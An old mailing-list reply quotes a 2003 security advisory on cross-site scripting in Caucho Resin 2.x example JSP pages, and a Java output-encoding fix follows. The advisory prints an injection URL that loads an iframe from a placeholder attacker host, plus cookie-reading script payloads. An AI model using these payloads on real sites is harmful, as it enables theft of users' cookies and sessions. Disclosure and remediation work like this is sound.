Message-ID: <000c01c39676$5d489110$3200000a@pluto>
From: jkuperus at planet.nl (jelmer)
Subject: Caucho Resin 2.x - Cross Site Scripting
Donny,
These are in the example applications, which any sane admin should disable
right away, much like caucho-status.
These are basic procedures in setting up a server.
--jelmer
----- Original Message -----
From: "morning_wood" <se_cur_ity@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Sunday, October 19, 2003 12:37 PM
Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting
> -----------------------------------------------------------------
> - EXPL-A-2003-026 exploitlabs.com Advisory 026 -
> -----------------------------------------------------------------
> -= Caucho Resin =-
>
>
> Donnie Werner
> Oct 18, 2003
>
>
>
> Vulnerability(s):
> ----------------
> 1. XSS
>
>
> note: this is not
>
> http://www.securiteam.com/securitynews/5KP0O1F7FM.html
> http://www.securitytracker.com/alerts/2002/Jun/1004552.html
>
>
> Product:
> --------
> Caucho Resin Httpd 2.x
>
> Reviews:
> --------
> http://www.caucho.com/sales/customers.xtp
>
>
> Description of product:
> -----------------------
> "Resin? is a cutting-edge XML Application Server.
> It serves the fastest servlets and JSP."
>
>
> VULNERABILITY / EXPLOIT
> ======================
> default port 8080 ( others used )
>
> affected scripts:
> env.jsp
> form.jsp
> session.jsp
> tictactoe.jsp
>
>
> http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
> or
>
> <SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>
>
> the above is only an example, all cookie and session
> stealing Cross Site Scripting was possible.
>
>
> guestbook.jsp allows persistent XSS
>
> enter evil javascript in "name" and "comment" fields
> it is then re-rendered upon revisit
>
>
>
>
> Local:
> ------
> nay
>
> Remote:
> -------
> yeh
>
>
> Vendor Fix:
> -----------
> Versions 3.x don't have the examples included
>
>
>
> Vendor Contact:
> ---------------
> bugs@...cho.com
> Concurrent with this advisory
>
>
> Credits:
> --------
> Donnie Werner
> CTO E2 Labs
> http://e2-labs.cpm
> morning_wood@...labs.com
>
> http://nothackers.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
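A minimal output-encoding fix for the reflected case the advisory describes, as an added example that is not from the advisory or from Caucho's example applications: the `EscapedEcho` class, its `renderUnsafe`/`renderSafe` methods and the sample `move` value are assumptions for illustration. In a JSP the same change is writing `<%= EscapedEcho.escapeHtml(request.getParameter("move")) %>` instead of echoing the raw parameter.

```java
// Added example (not from the advisory or from Caucho). The reflected-XSS
// pattern described above is a JSP echoing request.getParameter("move")
// into the page unencoded; the fix is to HTML-encode every untrusted value
// at output time. This class runs stand-alone (no servlet API required).
public class EscapedEcho {

    // Encode the five characters that let a value break out of HTML text
    // or a quoted attribute. Everything else passes through unchanged.
    public static String escapeHtml(String s) {
        if (s == null) return "";
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '&':  sb.append("&amp;");  break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Vulnerable shape (assumed, for illustration): the parameter goes
    // straight into the markup, so a value such as <iframe ...> or <SCRIPT>
    // becomes live HTML in the visitor's browser.
    public static String renderUnsafe(String move) {
        return "<p>Your move: " + move + "</p>";
    }

    // Hardened shape: the same markup, but the value is encoded, so the
    // browser displays the tags as text instead of interpreting them.
    public static String renderSafe(String move) {
        return "<p>Your move: " + escapeHtml(move) + "</p>";
    }

    public static void main(String[] args) {
        // Constructed sample input of the kind the advisory shows.
        String move = "<SCRIPT>alert(document.domain);</SCRIPT>";
        System.out.println(renderUnsafe(move)); // tags reach the browser intact
        System.out.println(renderSafe(move));   // &lt;SCRIPT&gt;... shown as text
    }
}
```

The persistent guestbook case is the same defect with a storage step in between; the rule is unchanged: encode at the point the stored value is written into HTML, not when it is saved.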